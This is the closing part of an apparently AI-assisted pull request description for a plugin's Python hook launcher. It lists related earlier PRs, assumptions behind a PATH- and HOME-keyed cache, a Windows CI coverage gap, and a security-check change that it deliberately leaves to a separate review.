- #2853 — the previous optimisation of the launcher's engine read, whose one-read/stops-at-the-match contract this PR supersedes.
- #1028 — `hygiene.MIN_PYTHON` as the single origin of the version floor, preserved here.
- #1014 — why the cache path may derive only from `${CLAUDE_PLUGIN_ROOT}` / `$HOME`.
- #1423 — the fail-closed exit-code contract the watchdog change works within.

## Assumptions and follow-ups

- **The cache benefit assumes `PATH` and `$HOME` are stable across hook invocations.** `PATH` is the cache key; if the harness varied it per call the warm path would never hit. The fallback is correct either way (no `HOME` → cold path, never a wrong answer), but the *benefit* depends on it. Worth a post-merge confirmation on a live session.
- **CI coverage gap.** `disk-hygiene-guard-windows` runs `GuardTests` only; `run-python-hook.test.sh` runs in the plugin-gate lane. Every behavior added to the launcher is Windows-specific (MSYS subshell cost, `-nt` granularity, WindowsApps stubs). If plugin-gate is Linux-only, the launcher contracts are not exercised on the platform they exist for. Not fixed here.
- **Not touched deliberately:** `_engine_gate_relevant`'s semantics. Its marker-free fallback calls `os.path.samefile` on **every** whitespace token of **every** command, which is the identified stall source (a dead drive letter or UNC path in an unrelated command stalls it unboundedly). Its own docstring says it scans "separator-carrying words", but the implementation passes *all* words with no separator filter. Adding that filter looks like a large further win and matches the documented contract — but it is a change to the security core's semantics and deserves its own PR and its own review, not a ride-along in a performance change.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
